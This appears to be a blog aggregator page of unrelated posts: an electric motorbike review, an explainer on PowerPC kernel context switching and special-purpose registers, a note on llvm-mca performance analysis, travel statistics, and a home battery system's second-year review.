Firstly, it handles exactly like a standard motorbike - it handles almost exactly like my previous Triumph Tiger Sport 1050. But it is so much easier to ride. You twist the throttle and you go. You wind it back and you slow down. If you want to, the bike will happily do nought to 100km/hr in under four seconds. But it will also happily and smoothly glide along in traffic. It says "you name the speed, I'm happy to go". It's not temperamental or impatient; it has no weird points where the throttle suddenly gets an extra boost or where the engine braking suddenly drops off. It is simple to ride.
As an aside, this makes it perfect for lane filtering. On my previous bike this would always be tinged with a frisson of danger - I had to rev it and ease the clutch in with a fair bit of power so I didn't accidentally stall it, but that always took some time. Now, I simply twist the throttle and I am ahead of the traffic - no danger of stalling, no delay in the clutch gripping, just power. It is much safer in that scenario.
I haven't done a lot of touring yet, but I've ridden up to Gosford once and up to Sydney several times. This is where Energica really is ahead of pretty much every other electric motorbike on the market now - they do DC fast charging. And by 'fast charger' here I mean anything from 50KW up; the Energica can only take 25KW maximum anyway :-) But this basically means I have to structure any stops we do around where I can charge up - no more stopping in at the local pub or a cafe on a whim for morning tea. That has to either offer DC fast charging or I'm moving on - the 3KW onboard AC charger means a 22KW AC charger is useless to me. In the hour or two we might stop for lunch I'd only get another 60 - 80 kilometres more range on AC; on DC I would be done in less than an hour.
But OTOH my experience so far is that structuring those breaks around where I can charge up is relatively easy. Most riders will furiously nod when I say that I can't sit in the seat for more than two hours before I really need to stretch the legs and massage the bum :-) So if that break is at a DC charger, no problems. I can stop at Sutton Forest or Pheasant's Nest or even Campbelltown and, in the time it takes for me to go to the toilet and have a bit of a coffee and snack break, the bike is basically charged and ready to go again.
The lesson I've learned, though, is to always give it that bit longer and charge as much as I can up to 80%. It's tempting sometimes when I'm standing around in a car park watching the bike charge to move on and charge up a bit more at the next stop. The problem is that, with chargers still relatively rare and there often only being one or two at each site, a single charger not working can mean another fifty or even a hundred kilometres more riding. That's a quarter to half my range, so I cannot afford to risk that. Charge up and take a good book (and a spare set of headphones).
In the future, of course, when there's a bank of a dozen DC fast chargers in every town, this won't be a problem. Charger anxiety only exists because they are still relatively rare. When charging is easy to find and always available, and there are electric forecourts like the UK is starting to get, charging stops will be easy and will fit in with my riding.
Anyway.
Other advantages of the Experia:
You can get it with a complete set of Givi MonoKey top box and panniers. This means you can buy your own much nicer and more streamlined top box and it fits right on.
Charging at home takes about six hours, so it's easy to do overnight. The Experia comes with an EVSE so you don't need any special charger at home. And really, since the onboard AC charger can only accept 3KW, there's hardly any point in spending much money on a home charger for the Experia.
Minor niggles:
The seat is a bit hard. I'm considering getting the EONE Canyon saddle, although I also just need to try to work out how to get underneath the seat to see if I can fit my existing sheepskin seat cover.
There are a few occasional glitches in the display in certain rare situations. I've mentioned them to Energica, hopefully they'll be addressed.
Overall rating:
5 stars. Already recommending.
This post is a dive (well, more of a meander) through some of the PowerPC specific aspects of context switching, especially on the Special Purpose Register (SPR) handling. It was motivated by my recent work on adding kernel support for a hardware feature that interfaces with software through an SPR.
The context we are concerned about in this post is the task context. That's all the state that makes up a 'task' in the eyes of the kernel. These are resources like registers, the thread ID, memory mappings, and so on. The kernel is able to save and restore this state into a task context data structure, allowing it to run arbitrarily many tasks concurrently despite the limited number of CPU cores available. It can simply save these resource values when switching out a task, and replace the CPU state with the values stored by the task being switched in.
Unless you're a long time kernel developer, chances are you haven't heard of or looked too closely at a 'task' in the kernel. The next section gives a rundown of tasks and processes, giving you a better frame of reference for the later context switching discussion.
To understand the difference between these three concepts, we'll start with how the kernel sees everything: tasks. Tasks are the kernel's view of an 'executable unit' (think single threaded process), a self contained thread of execution that has a beginning, performs some operations, then (maybe) ends. They are the indivisible building blocks upon which multitasking and multithreading can be built, where multiple tasks run independently, or optionally communicate in some manner to distribute work.
The kernel represents each task with a struct task_struct. This is an enormous
struct (around 10KB) of all the pieces of data people have wanted to associate
with a particular unit of execution over the decades. The architecture specific
state of the task is stored in a one-to-one mapped struct thread_struct,
available through the thread member in the task_struct. The name 'thread'
when referring to this structure on a task should not be confused with the
concept of a thread we'll visit shortly.
A task is highly flexible in terms of resource sharing. Many resources, such as the memory mappings and file descriptor tables, are held through reference counted handles to a backing data structure. This makes it easy to mix-and-match sharing of different components between other tasks.
Approaching tasks from the point of view of userspace, here we think of execution in terms of processes and threads. If you want an 'executable unit' in userspace, you are understood to be talking about a process or thread. These are implemented as tasks by the kernel though; a detail like running in userspace mode on the CPU is just another property stored in the task struct.
For an example of how tasks can either copy or share their parent's resources, consider what happens when creating a child process with the fork() syscall.
The child will share memory and open files at the time of the fork,
but further changes to these resources in either process are not visible to
the other. At the time of the fork, the kernel simply duplicates the parent task and replaces relevant resources with copies of the parent's values1.
It is often useful to have multiple processes share things like memory and open files though: this is what threads provide. A process can be 'split' into multiple threads2, each backed by its own task. These threads can share resources that are normally isolated between processes.
This thread creation mechanism is very similar to process creation. The
clone() family of syscalls allow creating a new thread that shares resources
with the thread that cloned itself. Exactly what resources get shared between
threads is highly configurable, thanks to the kernel's task representation. See
the clone(2) manpage for
all the options. Creating a process can be thought of as creating a thread where
nothing is shared. In fact, that's how fork() is implemented under the hood:
the fork() syscall is implemented as a thin wrapper around clone()'s
implementation where nothing is shared, including the process group ID.
// kernel/fork.c (approximately)
SYSCALL_DEFINE0(fork)
{
struct kernel_clone_args args = {
.exit_signal = SIGCHLD,
};
return kernel_clone(&args);
}
SYSCALL_DEFINE2(clone3, struct clone_args __user *, uargs, size_t, size)
{
int err;
struct kernel_clone_args kargs;
pid_t set_tid[MAX_PID_NS_LEVEL];
kargs.set_tid = set_tid;
err = copy_clone_args_from_user(&kargs, uargs, size);
if (err)
return err;
if (!clone3_args_valid(&kargs))
return -EINVAL;
return kernel_clone(&kargs);
}
pid_t kernel_clone(struct kernel_clone_args *args) {
// do the clone
}
That's about it for the differences in processes, threads, and tasks from the point of view of the kernel. A key takeaway here is that, while you will often see processes and threads discussed with regards to userspace programs, there is very little difference under the hood. To the kernel, it's all just tasks with various degrees of shared resources.
As a final prerequisite, in this section we look at SPRs. The SPRs are CPU
registers that, to put it simply, provide a catch-all set of functionalities for
interacting with the CPU. They tend to affect or reflect the CPU state in
various ways, though are very diverse in behaviour and purpose. Some SPRs, such
as the Link Register (LR), are similar to GPRs in that you can read and write
arbitrary data. They might have special interactions with certain instructions,
such as the LR value being used as the branch target address of the blr
(branch to LR) instruction. Others might provide a way to view or interact with
more fundamental CPU state, such as the Authority Mask Register (AMR) which the
kernel uses to disable accesses to userspace memory while in supervisor mode.
Most SPRs are per-CPU, much like GPRs. And, like GPRs, it makes sense for many of them to be tracked per-task, so that we can conceptually treat them as a per-task resource. But, depending on the particular SPR, writing to them can be slow. The highly used data-like SPRs such as LR, CTR (Count Register), etc., are possible to rename, making them comparable to GPRs in terms of read/write performance. But others that affect the state of large parts of the CPU core, such as the Data Stream Control Register (DSCR), can take a while for the effects of changing them to be applied. Well, not so slow that you will notice the occasional access, but there's one case in the kernel that occurs extremely often and needs to change a lot of these SPRs to support our per-task abstraction: context switches.
Here we'll explore the actual function behind performing a context switch. We're interested in the SPR handling especially, because that's going to inform how we start tracking a new SPR on a per-task basis, so we'll be skimming over a lot of unrelated aspects.
We start our investigation in the aptly named context_switch() function in
kernel/sched/core.c.
// kernel/sched/core.c
/*
* context_switch - switch to the new MM and the new thread's register state.
*/
static __always_inline struct rq *
context_switch(struct rq *rq, struct task_struct *prev,
struct task_struct *next, struct rq_flags *rf)
Along with some scheduling metadata, we see it takes a previous task and a next
task. As we discussed above, the struct task_struct type describes a unit of
execution that defines (among other things) how to set up the state of
the CPU.
This function starts off with some generic preparation and memory context
changes3, before getting to the meat of the function with
switch_to(prev, next,prev). This switch_to() call is actually a macro, which
unwraps to a call to __switch_to(). It's also at this point that we enter the
architecture specific implementation.
// arch/powerpc/include/asm/switch_to.h (switch_to)
// arch/powerpc/kernel/process.c (__switch_to)
struct task_struct *__switch_to(struct task_struct *prev,
struct task_struct *new)
Here we've only got our previous and next tasks to work with, focusing on just doing the switch.
Once again, we'll skip through most of the implementation. You'll see a few odds
and ends being handled: asserting we won't be taking any interrupts, handling
some TLB flushing, a copy-paste edge case, and some breakpoint handling on
certain platforms. Then we reach what we were looking for: save_sprs(). The
relevant section looks something like as follows
/*
* We need to save SPRs before treclaim/trecheckpoint as these will
* change a number of them.
*/
save_sprs(&prev->thread);
/* Save FPU, Altivec, VSX and SPE state */
giveup_all(prev);
__switch_to_tm(prev, new);
if (!radix_enabled()) {
/*
* We can't take a PMU exception inside _switch() since there
* is a window where the kernel stack SLB and the kernel stack
* are out of sync. Hard disable here.
*/
hard_irq_disable();
}
/*
* Call restore_sprs() and set_return_regs_changed() before calling
* _switch(). If we move it after _switch() then we miss out on calling
* it for new tasks. The reason for this is we manually create a stack
* frame for new tasks that directly returns through ret_from_fork() or
* ret_from_kernel_thread(). See copy_thread() for details.
*/
restore_sprs(old_thread, new_thread);
The save_sprs() function itself does the following to its prev->thread
argument.
// arch/powerpc/kernel/process.c
static inline void save_sprs(struct thread_struct *t)
{
#ifdef CONFIG_ALTIVEC
if (cpu_has_feature(CPU_FTR_ALTIVEC))
t->vrsave = mfspr(SPRN_VRSAVE);
#endif
#ifdef CONFIG_SPE
if (cpu_has_feature(CPU_FTR_SPE))
t->spefscr = mfspr(SPRN_SPEFSCR);
#endif
#ifdef CONFIG_PPC_BOOK3S_64
if (cpu_has_feature(CPU_FTR_DSCR))
t->dscr = mfspr(SPRN_DSCR);
if (cpu_has_feature(CPU_FTR_ARCH_207S)) {
t->bescr = mfspr(SPRN_BESCR);
t->ebbhr = mfspr(SPRN_EBBHR);
t->ebbrr = mfspr(SPRN_EBBRR);
t->fscr = mfspr(SPRN_FSCR);
/*
* Note that the TAR is not available for use in the kernel.
* (To provide this, the TAR should be backed up/restored on
* exception entry/exit instead, and be in pt_regs. FIXME,
* this should be in pt_regs anyway (for debug).)
*/
t->tar = mfspr(SPRN_TAR);
}
if (cpu_has_feature(CPU_FTR_DEXCR_NPHIE))
t->hashkeyr = mfspr(SPRN_HASHKEYR);
#endif
}
Later, we set up the SPRs of the new task with restore_sprs():
// arch/powerpc/kernel/process.c
static inline void restore_sprs(struct thread_struct *old_thread,
struct thread_struct *new_thread)
{
#ifdef CONFIG_ALTIVEC
if (cpu_has_feature(CPU_FTR_ALTIVEC) &&
old_thread->vrsave != new_thread->vrsave)
mtspr(SPRN_VRSAVE, new_thread->vrsave);
#endif
#ifdef CONFIG_SPE
if (cpu_has_feature(CPU_FTR_SPE) &&
old_thread->spefscr != new_thread->spefscr)
mtspr(SPRN_SPEFSCR, new_thread->spefscr);
#endif
#ifdef CONFIG_PPC_BOOK3S_64
if (cpu_has_feature(CPU_FTR_DSCR)) {
u64 dscr = get_paca()->dscr_default;
if (new_thread->dscr_inherit)
dscr = new_thread->dscr;
if (old_thread->dscr != dscr)
mtspr(SPRN_DSCR, dscr);
}
if (cpu_has_feature(CPU_FTR_ARCH_207S)) {
if (old_thread->bescr != new_thread->bescr)
mtspr(SPRN_BESCR, new_thread->bescr);
if (old_thread->ebbhr != new_thread->ebbhr)
mtspr(SPRN_EBBHR, new_thread->ebbhr);
if (old_thread->ebbrr != new_thread->ebbrr)
mtspr(SPRN_EBBRR, new_thread->ebbrr);
if (old_thread->fscr != new_thread->fscr)
mtspr(SPRN_FSCR, new_thread->fscr);
if (old_thread->tar != new_thread->tar)
mtspr(SPRN_TAR, new_thread->tar);
}
if (cpu_has_feature(CPU_FTR_P9_TIDR) &&
old_thread->tidr != new_thread->tidr)
mtspr(SPRN_TIDR, new_thread->tidr);
if (cpu_has_feature(CPU_FTR_DEXCR_NPHIE) &&
old_thread->hashkeyr != new_thread->hashkeyr)
mtspr(SPRN_HASHKEYR, new_thread->hashkeyr);
#endif
}
The gist is we first perform a series of mfspr operations, saving the SPR
values of the currently running task into its associated task_struct. Then we
do a series of mtspr operations to restore the desired values of the new
task back into the CPU.
This procedure has two interesting optimisations, as explained by
the commit
that introduces save_sprs() and restore_sprs():
powerpc: Create context switch helpers save_sprs() and restore_sprs()
Move all our context switch SPR save and restore code into two helpers. We do a few optimisations:
Group all mfsprs and all mtsprs. In many cases an mtspr sets a scoreboarding bit that an mfspr waits on, so the current practise of mfspr A; mtspr A; mfpsr B; mtspr B is the worst scheduling we can do.
SPR writes are slow, so check that the value is changing before writing it.
And that's basically it, as far as the implementation goes at least. When first investigating this one question that kept nagging me was: why do we read these values here, instead of tracking them as they are set? I can think of several reasons this might be done:
mtspr in a completely
different part of the codebase breaks context switching. It would also mean
that every mtspr would have to disable interrupts, lest the context switch
occurs between the mtspr and recording the change in the task struct.mtspr correctly, certain SPRs can be
changed by userspace without kernel assistance. Some of these SPRs are also
unused by the kernel, so saving them with the GPRs would be pessimistic (a
waste of time if the task ends up returning back to userspace without
swapping). For example, VRSAVE is an unprivileged scratch register that the
kernel doesn't make use of.restore_sprs()?If you paid close attention, you might have noticed that the previous task being
passed to restore_sprs() is not the same as the one being passed to
save_sprs(). We have the following instead
struct task_struct *__switch_to(struct task_struct *prev,
struct task_struct *new)
{
// ...
new_thread = &new->thread;
old_thread = ¤t->thread;
// ...
save_sprs(&prev->thread); // using prev->thread
// ...
restore_sprs(old_thread, new_thread); // using old_thread (current->thread)
// ...
last = _switch(old_thread, new_thread);
// ...
return last;
}
What gives? As far as I can determine, we require that the prev argument to
__switch_to is always the currently running task (as opposed being in some
dedicated handler or ill-defined task state during the switch). And on PowerPC,
we can access the currently running task's thread struct through the current
macro. So, in theory, current->thread is an alias for prev->thread. Anything
else wouldn't make any sense here, as we are storing the SPR values into
prev->thread, but making decisions about their values in restore_sprs()
based on the current->thread saved values.
As for why we use both, it appears to be historical. We originally ran
restore_sprs() after _switch(), which finishes swapping state from the
original thread to the one being loaded in. This means our stack and registers
are swapped out, so our prev variable we stored our current SPRs in is lost to
us: it is now the prev of the task we just woke up. In fact, we've completely
lost any handle to the task that just swapped itself out. Well, almost: that's
where the last return value of _switch() comes in. This is a handle to the
task that just went to sleep, and we were originally reloading old_thread
based on this last value. However a future patch moved restore_sprs() to
above the _switch() call thanks to an edge case with newly created tasks, but
the use of old_thread apparently remained.
Congratulations, you are now an expert on several of the finer details of
context switching on PowerPC. Well, hopefully you learned something new and/or
interesting at least. I definitely didn't appreciate a lot of the finer details
until I went down the rabbit hole of differentiating threads, processes, and
tasks, and the whole situation with prev vs old_thread.
This is completely unrelated, but the kernel's implementation of doubly-linked lists does not follow the classic implementation, where a list node contains a next, previous, and data pointer. No, if you look at the actual struct definition you will find
struct hlist_node {
struct hlist_node *next, **pprev;
};
which decidedly does not contain any data component.
It turns out that the kernel expects you to embed the node as a field on the data struct, and the data-getter applies a mixture of macro and compiler builtin magic to do some pointer arithmetic to convert a node pointer into a pointer to the structure it belongs to. Naturally this is incredibly type-unsafe, but it's elegant in its own way.
While this is conceptually what happens, the kernel can apply tricks to avoid the overhead of copying everything up front. For example, memory mappings apply copy-on-write (COW) to avoid duplicating all of the memory of the parent process. But from the point of view of the processes, it is no longer shared. ↩
Or you could say that what we just called a 'process' is a thread, and the 'process' is really a process group initially containing a single thread. In the end it's semantics that don't really matter to the kernel though. Any thread/process can create more threads that can share resources with the parent. ↩
Changing the active memory mapping has no immediate effect on the
running code due to address space quadrants. In the hardware, the top two bits
of a 64 bit effective address determine what memory mapping is applied to
resolve it to a real address. If it is a userspace address (top two bits are
0) then the configured mapping is used. But if it is a kernel address (top two
bits are 1) then the hardware always uses whatever mapping is in place for
process ID 0 (the kernel knows this, so reserves process ID 0 for this purpose
and does not allocate it to any userspace tasks). So our change to the memory
mapping only applies once we return to userspace, or try to access memory
through a userspace address (through get_user() and put_user()). The
hypervisor has similar quadrant functionality, but different rules. ↩
Way back in the distant past, when the Apple ][ and the Commodore 64 were king, you could read the manual for a microprocessor and see how many CPU cycles each instruction took, and then do the math as to how long a sequence of instructions would take to execute. This cycle counting was used pretty effectively to do really neat things such as how you’d get anything on the screen from an Atari 2600. Modern CPUs are… complex. They can do several things at once, in a different order than what you wrote them in, and have an interesting arrangement of shared resources to allocate.
So, unlike with simpler hardware, if you have a sequence of instructions for a modern processor, it’s going to be pretty hard to work out how many cycles that could take by hand, and it’s going to differ for each micro-architecture available for the instruction set.
When designing a microprocessor, simulating what a series of existing instructions will take to execute compared to the previous generation of microprocessor is pretty important. The aim should be for it to take less time or energy or some other metric that means your new processor is better than the old one. It can be okay if processor generation to generation some sequence of instructions take more cycles, if your cycles are more frequent, or power efficient, or other positive metric you’re designing for.
Programmers may want this simulation too, as some code paths get rather performance critical for certain applications. Open Source tools for this aren’t as prolific as I’d like, but there is llvm-mca which I (relatively) recently learned about.
llvm-mca is a performance analysis tool that uses information available in LLVM (e.g. scheduling models) to statically measure the performance of machine code in a specific CPU.
the llvm-mca docs
So, when looking at an issue in the IPv6 address and connection hashing code in Linux last year, and being quite conscious of modern systems dealing with a LOT of network packets, and thus this can be quite CPU usage sensitive, I wanted to make sure that my suggested changes weren’t going to have a large impact on performance – across the variety of CPU generations in use.
There’s two ways to do this: run everything, throw a lot of packets at something, and measure it. That can be a long dev cycle, and sometimes just annoying to get going. It can be a lot quicker to simulate the small section of code in question and do some analysis of it before going through the trouble of spinning up multiple test environments to prove it in the real world.
So, enter llvm-mca and the ability to try and quickly evaluate possible changes before testing them. Seeing as the code in question was nicely self contained, I could easily get this to a point where I could easily get gcc (or llvm) to spit out assembler for it separately from the kernel tree. My preference was for gcc as that’s what most distros end up compiling Linux with, including the Linux distribution that’s my day job (Amazon Linux).
In order to share the results of the experiments as part of the discussion on where the code changes should end up, I published the code and results in a github project as things got way too large to throw on a mailing list post and retain sanity.
I used a container so that I could easily run it in a repeatable isolated environment, as well as have others reproduce my results if needed. Different compiler versions and optimization levels will very much produce different sequences of instructions, and thus possibly quite different results. This delta in compiler optimization levels is partially why the numbers don’t quite match on some of the mailing list messages, although the delta of the various options was all the same. The other reason is learning how to better use llvm-mca to isolate down the exact sequence of instructions I was caring about (and not including things like the guesswork that llvm-mca has to do for branches).
One thing I learned along the way is how to better use llvm-mca to get the results that I was looking for. One trick is to very much avoid branches, as that’s going to be near complete guesswork as there’s not a simulation of the branch predictor (at least in the version I was using.
The big thing I wanted to prove: is doing the extra work having a small or large impact on number of elapsed cycles. The answer was that doing a bunch of extra “work” was essentially near free. The CPU core could execute enough things in parallel that the incremental cost of doing extra work just… wasn’t relevant.
This helped getting a patch deployed without impact to performance, as well as get a patch upstream, fixing an issue that was partially fixed 10 years prior, and had existed since day 1 of the Linux IPv6 code.
Naturally, this wasn’t a solo effort, and that’s one of the joys of working with a bunch of smart people – both at the same company I work for, and in the broader open source community. It’s always humbling when you’re looking at code outside your usual area of expertise that was written (and then modified) by Really Smart People, and you’re then trying to fix a problem in it, while trying to learn all the implications of changing that bit of code.
Anyway, check out llvm-mca for your next adventure into premature optimization, as if you’re going to get started with evil, you may as well start with what’s at the root of all of it.
At this rate, there is no real blogging here, regardless of the lofty plans to starting writing more. Stats update from Hello 2023:
219 days on the road (less than 2022! -37, over a month, shocking), 376,961km travelled, 44 cities, 17 countries.
Can’t say why it was less, because it felt like I spent a long time away…
In Kuala Lumpur, I purchased a flat (just in time to see Malaysia go down), and I swapped cars (had a good 15 year run). I co-founded a company, and I think there is a lot more to come.
2024 is shaping up to be exciting, busy, and a year, where one must just do.
good read: 27 Years Ago, Steve Jobs Said the Best Employees Focus on Content, Not Process. Research Shows He Was Right. in simple terms, just do.
It’s time for a review of the second year of operation of our Redflow ZCell battery and Victron Energy inverter/charger system. To understand what follows it will help to read the earlier posts in this series:
In case ~12,000 words of background reading seem daunting, I’ll try to summarise the most important details here:
With the background out of the way we can get on to the fun stuff, including a roof replacement, an unexpected fault after a power outage followed by some mains switchboard rewiring, a small electrolyte leak, further hackery to keep a bit of charge in the battery most of the time, and finally some numbers.
The big job we did this year was replacing our concrete tile roof with colorbond steel. When we bought the house – which is in a rural area and thus a bushfire risk – we thought: “concrete brick exterior, concrete tile roof – sweet, that’s not flammable”. Unfortunately it turns out that while a tile roof works just fine to keep water out, it won’t keep embers out. There’s a gadzillion little gaps where the tiles overlap each other, and in an ember attack, embers will get up in there and ignite the fantastic amount of dust and other stuff that’s accumulated inside the ceiling over several decades, and then your house will burn down. This could be avoided by installing roof blanket insulation under the tiles, but in order to do that you have to first remove all the tiles and put them down somewhere without breaking them, then later put them all back on again. It’s a lot of work. Alternately, you can just rip them all off and replace the whole lot with nice new steel, with roof blanket insulation underneath.
Of course, you need good weather to replace a roof, and you need to take your solar panels down while it’s happening. This meant we had twenty-two solar panels stacked on our back porch for three weeks of prime PV time from February 17 – March 9, 2023, which I suspect lost us a good 500kW of power generation. Also, the roof job meant we didn’t have the budget to get a second ZCell this year – for the cost of the roof replacement, we could have had three new ZCells installed – but as my wife rightly pointed out, all the battery storage in the world won’t do you any good if your house burns down.
We had at least five grid power outages during the year. A few were brief, the grid being down for only a couple of minutes, but there were two longer ones in September (one for 30 minutes, one for about an hour and half). We got through the long ones just fine with either the sun high in the sky, or charge in the battery, or both. One of the earlier short outages though uncovered a problem. On the morning of May 30, my wife woke up to discover there was no power, and thus no running water. Not a good thing to wake up to. This happened while I was away, because of course something like this would happen while I was away. It turns out there had been a grid outage at about 02:10, then the grid power had come back, but our system had not. The Multis ended up in some sort of fault state and were refusing to power our loads. On the console was an alarm message: “#8 – Ground relay test failed”.
Note the times in the console messages are about 08:00. I confirmed via the logs from the VRM portal that the grid really did go out some time between 02:10 and 02:15, but after that there was nothing in the logs until 07:59, which is when my wife used the manual changeover switch to shift all our loads back to direct grid power, bypassing the Victron kit. That brought our internet connection back, along with the running water. I contacted Murray Roberts from Lifestyle Electrical and Simon Hackett for assistance, Murray logged in remotely and reset the Multis, my wife flicked the changeover switch back and everything was fine. But the question remained, what had gone wrong?
The ground relay in the Multis is there to connect neutral to ground when the grid fails. Neutral and ground are already physically connected on the grid (AC input) side of the Multis in the main switchboard, but when the grid power goes out, the Multis disconnect their inputs, which means the loads on the AC output side no longer have that fixed connection from neutral to ground. The ground relay activates in this case to provide that connection, which is necessary for correct operation of the safety switches on the power circuits in the house.
The ground relay is tested automatically by the Multis. Looking up Error 8 – Ground relay test failed on Victron’s web site indicated that either the ground relay really was faulty, or possibly there was a wiring fault or an issue with one of the loads in our house. So I did some testing. First, with the battery at 50% State of Charge (SoC), I did the following:
This demonstrated that the ground relay and the Multis in general were fine. Had there been a problem at that level we would have seen an error when I restored mains power. I then reconnected the loads and repeated steps 2-5 above. Again, there was no error which indicated the problem wasn’t due to a wiring defect or short in any of the power or lighting circuits. I also re-tested with the heater on and the water pump running just in case there may have been an issue specifically with either of those devices. Again, there was no error.
The only difference between my test above and the power outage in the middle of the night was that in the middle of the night there was no charge in the battery (it was right after a maintenance cycle) and no power from the sun. So in the evening I turned off the DC isolators for the PV and deactivated my overnight scheduled grid charge so there’d be no backup power of any form in the morning. Then I repeated the test:
The underlying detailed error message was “PE2 Closed”, which meant that it was seeing the relay as closed when it’s meant to be open. Our best guess is that we’d somehow hit an edge case in the Multi’s ground relay test, where they maybe tried to switch to inverting mode and activated the ground relay, then just died in that state because there was no backup power, and got confused when mains power returned. I got things running again by simply power cycling the Multis.
So it kinda wasn’t a big deal, except that if the grid went out briefly with no backup power, our loads would remain without power until one of us manually reset the system. This was arguably worse than not having the system at all, especially if it happened in the middle of the night, or when we were away from home. The fact that we didn’t hit this problem in the first year of operation is a testament to how unlikely this event is, but the fact that it could happen at all remained a problem.
One fix would have been to get a second battery, because then we’d be able to keep at least a tiny bit of backup power at all times regardless of maintenance cycles, but we’re not there yet. Happily, Simon found another fix, which was to physically connect the neutral together between the AC input and AC output sides of the Multis, then reconfigure them to use the grid code “AS4777.2:2015 AC Neutral Path externally joined”. That physical link means the load (output) side picks up the ground connection from the grid (input) side in the swichboard, and changing the grid code setting in the Multis disables the ground relay and thus the test which isn’t necessary anymore.
Murray needed to come out anyway to replace the carbon sock in the ZCell (a small item of annual maintenance) and was able to do that little bit of rewriting and configuration at the same time. I repeated my tests both with and without backup power and everything worked perfectly, i.e. the system came back immediately by itself after a grid outage with no backup power, and of course switched over to inverting just fine when there was backup power available.
This leads to the next little bit of fun. The carbon sock is a thing that sits inside the zinc electrolyte tank and helps to keep the electrolyte pH in the correct operating range. Unfortunately I didn’t manage to get a photo of one, but they look a bit like door snakes. Replacing the carbon sock means opening the case, popping one side of the Gas Handling Unit (GHU) off the tank, pulling out the old sock and putting in a new one. Here’s a picture of the ZCell with the back of the case off, indicating where the carbon sock goes:
When Murray popped the GHU off, he noticed that one of the larger pipes on one side had perished slightly. Thankfully he happened to have a spare GHU with him so was able to replace the assembly immediately. All was well until later that afternoon, when the battery indicated hardware failure due to “Leak 1 Trip” and shut itself down out of an abundance of caution. Upon further investigation the next day, Murry and I discovered there was a tiny split in one of the little hoses going into the GHU which was letting the electrolyte drip out.
This small electrolyte leak was caught lower down in the battery, where the leak sensor is. Murray sucked the leaked electrolyte out of there, re-terminated that little hose and we were back in business. I was happy to learn that Redflow had obviously thought about the possibility of this type of failure and handled it. As I said to Murray at the time, we’d rather have a battery that leaks then turns itself off than a battery that catches fire!
Aside from those two interesting events, the rest of the year of operation was largely quite boring, which is exactly what one wants from a power system. As before I kept a small overnight scheduled charge and a larger late afternoon scheduled charge active on weekdays to ensure there was some power in the battery to use at peak (i.e. expensive) grid times. In spring and summer the afternoon charge is largely superfluous because the battery has usually been well filled up from the solar by then anyway, but there’s no harm in leaving it turned on. The one hack I did do during the year was to figure out a way to keep a small (I went with 15%) MinSoC in the battery at all times except for maintenance cycle evenings, and the morning after. This is more than enough to smooth out minor grid outages of a few minutes, and given our general load levels should be enough to run the house for more than an hour overnight if necessary, provided the hot water system and heating don’t decide to come on at the same time.
My earlier experiment along these lines involved a script that ran on the Cerbo twice a day to adjust scheduled charge settings in order to keep the battery at 100% SoC at all times except for peak electricity hours and maintenance cycle evenings. As mentioned in TANSTAAFL I ran that for all of July, August and most of September 2022. It worked fine, but ultimately I decided it was largely a waste of energy and money, especially when run during the winter months when there’s not much sun and you end up doing a lot of grid charging. This is a horribly inefficient way of getting power into the battery (AC to DC) versus charging the battery direct from solar PV. We did still use those scripts in the second year, but rather more judiciously, i.e. we kept an eye on the BOM forecasts as we always do, then occasionally activated the 100% charge when we knew severe weather and/or thunderstorms were on the way, those being the things most likely to cause extended grid outages. I also manually triggered maintenance on the battery earlier than strictly necessary several times when we expected severe weather in the coming days, to avoid having a maintenance cycle (and thus empty battery) coincide with potential outages. On most of those occasions this effort proved to be unnecessary. Bearing all that in mind, my general advice to anyone else with a single ZCell system (aside from maybe adding scheduled charges to time-shift expensive peak electricity) is to just leave it alone and let it do its thing. You’ll use most of your locally generated electricity onsite, you’ll save some money on your power bills, and you’ll avoid some, but not all, grid outages. This is a pretty good position to be in.
That said, I couldn’t resist messing around some more, hence my MinSoC experiment. Simon’s installation guide points out that “for correct system operation, the Settings->ESS menu ‘Min SoC’ value must be set to 0% in single-ZCell systems”. The issue here is that if MinSoC is greater than 0%, the Victron gear will try to charge the battery while the battery is simultaneously trying to empty itself during maintenance, which of course just isn’t going to work. My solution to this is the following script, which I run from a cron job on the Cerbo twice a day, once at midnight UTC and again at 06:00 UTC with the --check-maintenance flag set:
Midnight UTC corresponds to the end of our morning peak electricity time, and 06:00 UTC corresponds to the start of our afternoon peak. What this means is that after the morning peak finishes, the MinSoC setting will cause the system to automatically charge the battery to the value specified if it’s not up there already. Given it’s after the morning peak (10:00 AEST / 11:00 AEDT) this charge will likely come from solar PV, not the grid. When the script runs again just before the afternoon peak (16:00 AEST / 17:00 AEDT), MinSoC is set to either the value specified (effectively a no-op), or zero if it’s a maintenance day. This allows the battery to be discharged correctly in the evening on maintenance days, while keeping some charge every other day in case of emergencies. Unlike the script that tries for 100% SoC, this arrangement results in far less grid charging, while still giving protection from minor outages most of the time.
In case Simon is reading this now and is thinking “FFS, I wrote ‘MinSoC must be set to 0% in single-ZCell systems’ for a reason!” I should also add a note of caution. The script above detects ZCell maintenance cycles based solely on the configured maintenance time limit and the duration since last maintenance. It does not – and cannot – take into account occasions when the user manually forces maintenance, or situations in which a ZCell for whatever reason hypothetically decides to go into maintenance of its own accord. The latter shouldn’t generally happen, but it can. The point is, if you’re running this MinSoC script from a cron job, you really do still want to keep an eye on what the battery is doing each day, in case you need to turn that setting off and disable the cron job. If you’re not up for that I will reiterate my general advice from earlier: just leave the system alone – let it do its thing and you’ll (almost always) be perfectly fine. Or, get a second ZCell and you can ignore the last several paragraphs entirely.
Now, finally, let’s look at some numbers. The year periods here are a little sloppy for irritating historical reasons. 2018-2019, 2019-2020 and 2020-2021 are all August-based due to Aurora Energy’s previous quarterly billing cycle. The 2021-2022 year starts in late September partly because I had to wait until our new electricity meter was installed in September 2021, and partly because it let me include some nice screenshots when I started writing TANSTAAFL on September 25, 2022. I’ve chosen to make this year (2022-2023) mostly sane, in that it runs from October 1, 2022 through September 30, 2023 inclusive. This is only six days offset from the previous year, but notably makes it much easier to accurately correlate data from the VRM portal with our bills from Aurora. Overall we have five consecutive non-overlapping 12 month periods that are pretty close together. It’s not perfect, but I think it’s good enough to work with for our purposes here.
| YeaR | Grid In | Solar In | Total In | Loads | Export |
|---|---|---|---|---|---|
| 2018-2019 | 9,031 | 6,682 | 15,713 | 11,827 | 3,886 |
| 2019-2020 | 9,324 | 6,468 | 15,792 | 12,255 | 3,537 |
| 2020-2021 | 7,582 | 6,347 | 13,929 | 10,358 | 3,571 |
| 2021-2022 | 8,531 | 5,640 | 14,171 | 10,849 | 754 |
| 2022-2023 | 8,936 | 5,744 | 14,680 | 11,534 | 799 |
